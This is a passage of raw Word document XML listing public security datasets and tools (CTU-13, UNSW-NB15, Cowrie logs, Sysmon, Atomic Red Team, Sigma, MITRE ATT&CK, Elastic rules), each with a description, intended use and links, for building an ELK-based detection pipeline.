      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId88" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://csr.lanl.gov/data/auth/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F85DE23" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="25E73011">
          <v:rect id="_x0000_i1283" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7D999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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. CTU-13 Botnet Dataset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B53D093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13 scenarios of botnet, malware, and normal traffic — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:t>labeled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> PCAPs and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:t>netflows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:t>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Botnet communication detection, C2 detection, APT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> baselining.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Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://www.stratosphereips.org/datasets-ctu13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Mirror (Kaggle):</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://www.kaggle.com/datasets/sohaibmohammed/ctu13-botnet-traffic-dataset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497552F8" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="312BD3EB">
          <v:rect id="_x0000_i1284" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCDD72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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. UNSW-NB15 Dataset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C820B9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Synthetic network capture with nine attack categories and rich feature sets.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Training and testing detection pipelines, ML-based intrusion detection.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Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://research.unsw.edu.au/projects/unsw-nb15-dataset</w:t>
        </w:r>
      </w:hyperlink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Kaggle Mirror:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId90" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.kaggle.com/datasets/mrwellsdavid/unsw-nb15</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F9C4FE6" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="796DACBE">
          <v:rect id="_x0000_i1285" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB1D33D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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. MAWI Working Group Traffic Archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1301BD34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Real-world backbone network traffic from Japan (daily 15-minute captures).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Background “benign” traffic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:t>modeling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> and anomaly detection.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Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId91" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://mawi.wide.ad.jp/mawi/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44C4390D" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="7F88F513">
          <v:rect id="_x0000_i1286" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CD744D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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. CAIDA Datasets (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for Applied Internet Data Analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F379E1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Internet backbone packet traces (anonymized), DDoS traces, worm propagation data.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Large-scale analysis, anomaly detection, academic simulations.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Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://www.caida.org/catalog/datasets/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197604A" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="442EC413">
          <v:rect id="_x0000_i1287" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3755CF87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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 7. Cowrie Honeypot Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720733F3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Real SSH/Telnet attacker logs (command history, payloads, session metadata).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Command analysis, attacker profiling, malicious pattern creation.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GitHub (Project):</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId92" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/cowrie/cowrie</w:t>
        </w:r>
      </w:hyperlink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Cowrie Logs Dataset (Kaggle):</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://www.kaggle.com/datasets/greysky/cowrie-honeypot-log-data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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HoneyDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> API:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://riskdiscovery.com/honeydb/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1960DD2D" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="5124F594">
          <v:rect id="_x0000_i1288" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3411D067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lastRenderedPageBreak/>
        <w:t>🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8. Microsoft Sysmon Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74DD14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Windows system monitoring tool capturing detailed process creation, file access, registry, and network connection logs.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PowerShell, process injection, credential dumping detection (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> input).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Sysmon Download:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId93" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon</w:t>
        </w:r>
      </w:hyperlink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Sysmon Config (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SwiftOnSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId94" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/SwiftOnSecurity/sysmon-config</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6052240D" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="11EDFF18">
          <v:rect id="_x0000_i1289" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3DF41E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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 9. Splunk Attack Data Repository (Sysmon Samples)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CB043B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Public repository of real Windows Event and Sysmon logs mapped to MITRE ATT&amp;CK techniques.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Creating ground-truth rules for process-based attack detection.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GitHub:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/splunk/attack_data</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="186E2367" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="725FE467">
          <v:rect id="_x0000_i1290" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5450E355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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 10. Atomic Red Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2E2792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Open-source MITRE ATT&amp;CK test scripts for generating realistic, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:t>labeled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> attack logs (PowerShell, credential dumping, lateral movement, exfiltration).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Generate fresh APT-style logs in your own lab setup.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GitHub:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/redcanaryco/atomic-red-team</w:t>
        </w:r>
      </w:hyperlink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Documentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://atomicredteam.io/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0D0E7" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="63CA3575">
          <v:rect id="_x0000_i1291" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="194ADEA0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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 11. Elastic Sample Data (Kibana)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684B5625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Built-in demo datasets for Kibana (web logs, ecommerce, flight data).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Testing ELK dashboards, verifying ingestion and queries.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Docs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId97" w:anchor="add-sample-data" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/kibana/current/getting-started.html#add-sample-data</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D34C839" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="5F71B506">
          <v:rect id="_x0000_i1292" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF1F312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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 12. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PacketTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PCAP Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4906D480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Community-shared PCAPs containing malware, C2, and network traces.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Running Suricata/Zeek to generate fresh event logs.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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PacketTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://packettotal.com/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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PCAPs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://www.virustotal.com/gui/home/upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26131FF9" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="283A9A1F">
          <v:rect id="_x0000_i1293" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BE5565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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 13. Sigma Rules (Detection Rule Framework)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDED78A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Open-source generic signature format for log events (convertible to ELK).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Creating and converting new detection rules.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GitHub:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/SigmaHQ/sigma</w:t>
        </w:r>
      </w:hyperlink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Sigma Conversion Tool (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sigmac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId99" w:anchor="sigmac" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/SigmaHQ/sigma/wiki/Tools#sigmac</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15FF866D" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="6B376329">
          <v:rect id="_x0000_i1294" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D4CD68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lastRenderedPageBreak/>
        <w:t>🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 14. MITRE ATT&amp;CK Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD8BF09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Knowledge base of adversary tactics and techniques used as references for detection rule mapping.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Tagging alerts (e.g., T1059.001, T1041) in Kibana and documentation.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MITRE ATT&amp;CK Site:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId100" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink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RSS Feed (New Techniques):</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://attack.mitre.org/resources/rss/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12259536" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="46E41C2C">
          <v:rect id="_x0000_i1295" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA0365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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 15. Elastic Stack Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C11E2C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Official guides for Elasticsearch, Logstash, Kibana, and Beats configuration.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Installation, pipeline setup, dashboard creation, and API integrations.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Elastic Stack Docs Hub:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId101" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elastic-stack/current/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FAF47B6" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="38199CA0">
          <v:rect id="_x0000_i1296" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F0721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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 16. Elastic Detection Rules Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A15A21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Official detection rules by Elastic Security Team (MITRE-mapped).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Base rules + examples to customize for your APT detection use cases.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GitHub:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId102" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/elastic/detection-rules</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="030B4F00" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="499A7B65">
          <v:rect id="_x0000_i1297" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E27084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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 17. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AbuseIPDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; AlienVault OTX (Threat Intel APIs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01036DAA" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> Free APIs for checking malicious IPs, domains, and URLs.</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use For:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> Enrich logs with external threat intelligence in Logstash.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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AbuseIPDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://www.abuseipdb.com/api.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AlienVault OTX:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://otx.alienvault.com/api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B92CC4D" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="467CA04B">
          <v:rect id="_x0000_i1298" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B492FF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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Recommended Log Pipeline Flow Using These Sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F780ABE" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve">Start with </w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CIC IDS 2017 / CTU-13 / Cowrie</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> logs for demo ingestion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40E727" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
